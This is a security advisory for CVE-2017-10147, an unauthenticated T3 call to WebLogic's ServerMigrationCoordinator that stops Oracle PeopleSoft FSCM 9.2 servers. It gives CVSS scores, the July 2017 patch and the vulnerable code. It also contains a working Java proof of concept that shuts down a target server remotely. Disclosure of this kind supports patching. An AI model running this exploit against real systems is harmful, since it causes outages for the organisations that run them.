ERPScanERPSCAN-17-041Unauthorized Container Shutdown In ServerMigrationCoordinator
8.6 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.003 Low
EPSS
Percentile
67.2%
Application: Oracle PeopleSoft **Versions Affected:**PeopleSoft FSCM 9.2 Vendor:Oracle **Bug:**Missing Authentication for Critical Function **Reported:**16.03.2017 **Vendor response:**17.03.2017 **Date of Public Advisory:**18.07.2017 **Reference: **Oracle CPU July 2017 Authors: Vahagn Vardanyan (ERPScan)
VULNERABILITY INFORMATION
Class: Missing Authentication
Risk: High
Impact: Impact on availability
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10147
CVSS Information
CVSS Base Score v3: 8.6 / 10
CVSS Base Vector:
| AV: Attack Vector (Related exploit range) | Network (N) |
|---|---|
| AC: Attack Complexity (Required attack complexity) | Low (L) |
| PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
| UI: User Interaction (Required user participation) | None (N) |
| S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Changed © |
| C: Impact to Confidentiality | None (N) |
| I: Impact to Integrity | None (N) |
| A: Impact to Availability | High (H) |
VULNERABILITY DESCRIPTION
An attacker can use a special T3 request for stopping the remote server.
VULNERABLE PACKAGES
PeopleSoft FSCM 9.2
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, implement Oracle CPU July 2017.
TECHNICAL DESCRIPTION
The vulnerability is presented in WebLogic/cluster/singleton/ServerMigrationCoordinator class in migrate functionality.
When we call the migrate function using T3 protocol, the PeopleSoft server will be stopped without authorization.
@Override public void migrate(final String serverName, final String sourceMachine, final String destinationMachine, final boolean sourceDown, final boolean destinationDown) throws ServerMigrationException { ServerMigrationTask task = this.taskMap.get(serverName); if (task == null) { task = new ServerMigrationTask(serverName, destinationMachine); if (MigrationDebugLogger.isDebugEnabled()) { MigrationDebugLogger.debug(serverName + " New Migration Task " + task); } this.taskMap.put(serverName, task); try { this.stopServer(sourceDown, task); this.startServer(destinationDown, task); } finally { this.taskMap.remove(serverName); } return; } throw new ServerMigrationException(“Migration operation in progress”, null); }
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
@Override
public void migrate(final String serverName, final String sourceMachine, final String destinationMachine, final boolean sourceDown, final boolean destinationDown) throws ServerMigrationException {
ServerMigrationTask task = this.taskMap.get(serverName);
if (task == null) {
task = new ServerMigrationTask(serverName, destinationMachine);
if (MigrationDebugLogger.isDebugEnabled()) {
MigrationDebugLogger.debug(serverName + " New Migration Task " + task);
}
this.taskMap.put(serverName, task);
try {
this.stopServer(sourceDown, task);
this.startServer(destinationDown, task);
}
finally {
this.taskMap.remove(serverName);
}
return;
}
throw new ServerMigrationException(“Migration operation in progress”, null);
}
—|—
Proof of Concept
static boolean rem_server_stop(String PS_SERVER_IP, Server PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException { Properties p = new Properties(); p.put(Context.INITIAL_CONTEXT_FACTORY, “weblogic.jndi.WLInitialContextFactory”); p.put(Context.PROVIDER_URL, “t3://”+PS_SERVER_IP+“:”+PS_SERVER_PORT); Context ctx = new InitialContext(p); Object obj = ctx.lookup(“weblogic/cluster/singleton/ServerMigrationCoordinator”); Object o = PortableRemoteObject.narrow(obj, ServerMigrationCoordinator.class); ServerMigrationCoordinator h = (ServerMigrationCoordinator) o; h.migrate(“PIA”,“а”,“any_data_or_ip”, true, true); return false; }
1
2
3
4
5
6
7
8
9
10
11
|
static boolean rem_server_stop(String PS_SERVER_IP, Server PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException {
Properties p = new Properties();
p.put(Context.INITIAL_CONTEXT_FACTORY, “weblogic.jndi.WLInitialContextFactory”);
p.put(Context.PROVIDER_URL, “t3://”+PS_SERVER_IP+“:”+PS_SERVER_PORT);
Context ctx = new InitialContext(p);
Object obj = ctx.lookup(“weblogic/cluster/singleton/ServerMigrationCoordinator”);
Object o = PortableRemoteObject.narrow(obj, ServerMigrationCoordinator.class);
ServerMigrationCoordinator h = (ServerMigrationCoordinator) o;
h.migrate(“PIA”,“а”,“any_data_or_ip”, true, true);
return false;
}
—|—
Related
8.6 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.003 Low
EPSS
Percentile
67.2%